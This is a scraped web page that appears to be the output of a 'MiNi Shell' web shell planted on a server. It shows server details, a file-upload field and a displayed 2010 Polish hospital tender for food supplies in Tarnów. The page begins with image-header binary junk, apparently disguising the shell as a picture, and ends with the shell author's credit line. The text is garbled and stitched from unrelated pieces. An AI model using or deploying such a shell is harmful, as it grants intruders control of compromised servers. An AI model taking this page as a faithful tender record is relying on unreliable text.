JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100219/34685-N-2010.html

<p class="kh_header"><b>Tarnów: zakup i dostawa artykułów żywnościowych dla Szpitala Wojewódzkiego im. Św. Łukasza SP ZOZ w Tarnowie</b><br>
<b>Numer ogłoszenia: 34685 - 2010; data zamieszczenia: 19.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. św. Łukasza SPZOZ , ul. Lwowska 178a, 33-100 Tarnów, woj. małopolskie, tel. 014 6315460, faks 014 6315460, 6212581.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lukasz.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa artykułów żywnościowych dla Szpitala Wojewódzkiego im. Św. Łukasza SP ZOZ w Tarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH, POSTĘPOWANIE PROWADZONE JEST W TRYBIE PRZETARGU NIEOGRANICZONEGO, WARTOŚĆ ZAMÓWIENIA NIE PRZEKRACZA KWOTY OKREŚLONEJ W PRZEPISACH  WYDANYCH NA PODSTAWIE ART. 11 UST. 8..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.80.00.00-6, 15.89.19.00-9, 15.87.22.00-3, 15.83.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia w tym zakresie przedstawią:
- Oświadczenie, że Wykonawca dysponuje co najmniej jednym środkiem transportu spełniającym warunki określone w rozporządzeniu ministra zdrowia z dnia 19 grudnia 2002roku w sprawie wymagań sanitarnych dot.: środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje osobą lub osobami zdolnymi do wykonania zamówienia, spełniającymi wymaganiami określone w ustawie z dnia 6 września 2001 o chorobach zakaźnych i zakażeniach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osoba podpisująca nie jest osoba upoważnioną na podstawie odpisu z Krajowego Rejestru Sadowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli dołączone do oferty ww. pełnomocnictwo będzie w formie kopii, Zamawiający wymaga, aby jego zgodność z oryginałem poświadczyła osoba wymieniona w rejestrze, która jest wskazana, jako upoważniona do reprezentowania Wykonawcy lub notariusz
- Oświadczenie , że Wykonawca  posiada stosowne atesty lub świadectwa dopuszczające do spożycia zgodnie z obowiązującymi przepisami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie trwania umowy możliwa jest zmiana cen tylko w przypadku zmiany: stawki VAT jednakże zmiana w tym zakresie obowiązują dopiero po podpisaniu aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukasz.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITALU WOJEWÓDZKIM IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A - Dział Logistyki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2010 godzina 10:00, miejsce: SZPITALU WOJEWÓDZKIM IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 30.03.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Chleb pszenny				                  	19 000 kg
2. Chleb pszenno-żytni			                          25 000 kg
3. Graham					             11 000 kg
4. Weka					                  	                   100 kg
5. Bułka tarta					                  	     700 kg
6. Drożdżówka z serem			                  	                   100 kg
7. Cwibak					                    	       60 kg
8. Babka drożdżowa				                  	     100 kg
9. Chleb słonecznikowy			                    	                     10 kg
10. Bułeczki z ziarnem 			                                               200  kg		
11. Bagietka 				                                	      20  kg
12. Keks					                                                  30 kg
13. Chałka z kruszonką			                       		       60 kg
14. Bułka zwykła 100g			                    		     200 szt.
15. Rogalik drożdżowy z marmoladą	                    		                   100  kg
16. Szarlotka					                                 100  kg
17. Babka piaskowa				                                   30  kg
18. Drożdże				                       10  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ARTYKUŁY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier	 (opakowanie jednostkowe 1 kg)	                20 000 kg
2. Ryż (opakowanie jednostkowe 1 KG)                              5 000 kg
3. Mąka pszenna	 (opakowanie jednostkowe 1kg)	     6 000 kg
4. Mąka ziemniaczana(opakowanie jednostkowe max1kg)         700 kg
5. Mąka kukurydziana(opakowanie jednostkowe max1kg)           40 kg
6. Kasza manna	(opakowanie jednostkowe max 1kg)	    2 000 kg
7. Kasza kukurydziana(opakowanie jednostkowe max 1kg)    1 500 kg
8. Kasza jęczmienna(opakowanie jednostkowe max1kg)       1 600 kg
9. Płatki jęczmienne(opakowanie jednostkowe max 1kg)        1 400 kg
10. Płatki owsiane	 górskie(opakowanie jednostkowe max 1kg)  1 500 kg
11. Biszkopty             200 kg
12. Suchary dietetyczne ( delikatesowe)    400 kg
13. Chrupki kukurydziane				400 kg
14. Galaretka owocowa					                                70 kg
15. Kisiel-bez cukru(opakowanie jednostkowe max 1kg)                                              70 kg
16. Budyń-bez cukru (opakowanie jednostkowe max 1kg)                                            70 kg
17. Herbata czarna granulowana (ETERNAL- opakowanie jednostkowe max 100g) 800 kg
18. Kakao naturalne					                                            120 kg
19. Kawa inka						                              150 kg
20. Ocet(opakowanie jednostkowe ? l)		                                            200  l
21. Olej uniwersalny (rzepakowy)			                                          1000  l
22. Bita śmietanka (w proszku)				                                  5 kg
23. Krakersy						                              600 kg
24. Herbatniki z cukrem					                              300 kg
25. Musztarda						                              500 kg
26. Majonez						                              500 kg
27. Migdały (płatki)					                                                3 kg
28. Śliwka kalifornijska					                                20 kg
29. Morela suszona                            5 kg
30. Kawa rozpuszczalna (Nescafe classic a 100g)                   20 szt.
31. Kawa rozpuszczalna (Nescafe classic a 200g)                   15 szt.
32. Groszek ptysiowy					                                50 kg
33. Rodzynki						                                10 kg
34. Wafel tortowy						                                50 szt.
35. Herbata Lipton (ekspresowa 25 szt)		                                              20 szt.
36. Sok owocowy bez cukru (karton1 l-czarna porzeczka)	                         1 000 szt.
37. Sok owocowy bez cukru (karton1 l-pomarańcza)                                              2 000 szt.
38. Sok owocowy bez cukru(karton1 l-jabłko)                                                        3 000 szt.
39. Sok owocowy bez cukru(karton1l-multiwitamina)                                            1 000 szt.           
      40. Sok owocowy ( 0.20 l-pomarańcza)  	                                                      1 000 szt.
      41. Napój owocowy (0,20 l-pomarańcza)		                                        1 000 szt. 
      42. Woda mineralna gazowana (butelka 0,33l)	                      	                      130 000 szt.
      43. Woda mineralna Piwniczanka (1,5l - lekko gazowana )                                          700 szt.  
44. Sok pomidorowy (karton 1 l )	                      1 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZUPKI I ODŻYWKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bebiko 1 (350g)					           1 200 szt.
2. Bebiko 2 (350g)						 600 szt.
3. Bebilon Ha 1	(400g)			                            60 szt.
4. Bebilon 1 (800 g)					 500 szt.
5. Bebilon 2 (800 g)			                           250 szt.
6. Bebilon comfort 1 (400g)                                                      120 szt.
7. Bebilon comfort 2 (400g)                                                       60 szt.
8. Nan 1(350g)							  800 szt.
9. Nan 2	(350g)						                300 szt.
10. Nan 2R(350g)							    60 szt.
11. NAN HA 1 (400g)						    60 szt.
12. Kleik ryżowy 170 g						  350 szt.
13. Kleik kukurydziany 170 g					                220 szt.
14. Kaszka ryżowa z jabłkami 180 g				                300 szt.
15. Kaszka ryżowa z bananami 180 g				                  60 szt.
16. Zupa marchwiowa z ryżem 125-130 g			             1 800 szt.
17. Zupa jarzynowa z kurczakiem 125-130g			             1 200 szt.
18. Zupa jarzynowa z królikiem  125-130g			             1 200 szt.
19. Zupa jarzynowa z indykiem 125-130g		                           1 400 szt.
20. Zupa jarzynowa z indykiem(dla alergików)	125-130g	               200 szt.
21. Zupa jarzynowa z kurczakiem i kaszą manną 125-130 g                         150 szt.     
22. Jabłko przetarte 130 g				                           1 700 szt.
23. Marchew przetarte 125-130g				                400 szt.
24. Kasza manna błyskawiczna                                                                         15 kg
        25. Bobo frut 0.175l					                           6 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.19.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Majeranek	   						       4 kg
2. Papryka mielona-słodka						       5 kg
3. Papryka mielona-ostra						       1 kg
4. Kminek								       6 kg
5. Ziele angielskie							       6 kg
6. Liść laurowy						                     5 kg
7. Przyprawa do potraw greckich (Gyros)				       2 kg
8. Curry								       1 kg
9. Sos do drobiu							     90 kg
10. Sos pieczarkowy						                   50 kg
11. Sos z zielonym pieprzem					                   10 kg
12. Sos włoski sałatkowy					                   30 kg
13. Sos biały							   150 kg
14. Zupa pieczarkowa						   150 kg
15. Bazylia							                     2 kg
16. Żelatyna							     50 kg
17. Fix do potraw chińskich					                   15 kg
18. Pieprz ziołowy (mielony)					                     5 kg
19. Kokos							                    3 kg
20. Sól jodowana					                           2 500 kg
21. Przyprawa w płynie 1l (maggi)				             1 100 szt.
22. Przyprawa w płynie 0.20 l					                150 szt.
23. Rosół wołowy					                              150 kg
24. Oregano							                    2 kg
25. Rosół drobiowy						                300 kg
26. Rosół jarzynowy						                700 kg
27. Vegeta								    10 kg
28. Pieprz czarny mielony					                  25 kg
29. Kwasek cytrynowy						    50 kg
30. Cynamon							      2 kg
31. Cukier waniliowy						    10 kg
32. Proszek do pieczenia						      5 kg
33. Cukier puder							    40 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MIÓD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miód naturalny   		            1 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com